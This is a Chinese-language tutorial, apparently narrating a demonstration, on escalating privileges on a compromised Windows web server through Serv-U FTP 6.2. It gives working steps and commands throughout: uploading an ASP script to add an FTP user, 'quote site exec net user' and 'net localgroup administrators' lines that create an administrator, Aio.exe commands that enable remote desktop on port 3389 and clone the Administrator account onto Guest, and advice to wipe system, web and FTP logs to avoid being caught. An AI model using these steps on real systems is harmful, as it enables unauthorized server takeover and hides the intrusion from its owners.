开始 要提权 首先得看看这里 服务器信息-组件支持 一般提权都会利用到这个

wscript.shell √ 命令行执行组件

在看看这里 开了终端了 有时候没开也会显示3389

个人爱好 提权的时候先看看有没有FTP 还有有没有开启终端的

方法比较简单 看操作 CMD里面输入命令FTP 目标地址 显示Serv-U FTP Server v6.2

有开FTP 而且是6.2版本的 有利用价值 这个让我们想到FTP的提权

连得上 说明开着 （小提示 如果没连得上有可能是改端口了 也有可能是没开 可以用扫描器扫一下）

接着上传一个ASP的提权脚本 lake大哥的 大家都熟悉吧 都英文来的

我简单说明一下就好了 Add User 这里是添加 Del User 删除

RUN提交 上面的默认不用修改 FTP user lake pass admin123 添加了

FTP帐号 lake 密码 admin123

连连 呵呵 进去了 说明添加帐户成功 接下来呢 就添加管理员帐号了 如果没开终端的话 也可以现在开

说明一下 现在添加的这个lake帐户是具有管理权限的哦 用到下面的命令

quote site exec net user shayu 83073645 /add添加用户

200 EXEC command successful (TID=33).

成功 继续添加权限

200 EXEC command successful (TID=33) OK了

服务器的3389已经被我开过了 我简单演示一下怎么开就OK了

用到一个工具AIO.exe 对了还得看看对方的机子是什么系统才好开3389 我已经事先看了

集体的是在WEBSHELL里面用CMD命令 VER 就可以知道了 没权限的话就自己传个CMD过去

现在看操作 我用工具传过去比较方便点

命令 quote site exec Aio.exe -Terminal 3389

在这里输入 不过注意下 那个是FTP下运行的命令 所以要在前面加上quote site exec这个才可以

OK 开了 在用这个命令Aio.exe -Clone Administrator Guest 83073645克隆帐户 也可以用之前的直接

登陆也可以 OK 到这里提权就完毕了 接下来的自由发挥了

走的时候别忘了擦PP咯 不然给人抓了 我可不管了 那边的是我用GUEST帐号登陆的 忽忽

清楚系统的日志掉了 可以的话 大家自己找找WEB的日志还有FTP的都要删除掉 我就不演示了

就到这里 88咯

相关命令：

Aio.exe -Clone Administrator Guest 83073645

Aio.exe -Terminal 3389

ftp提权命令:quote site exec net user shayu 83073645 /add

quote site exec net localgroup administrators shayu /add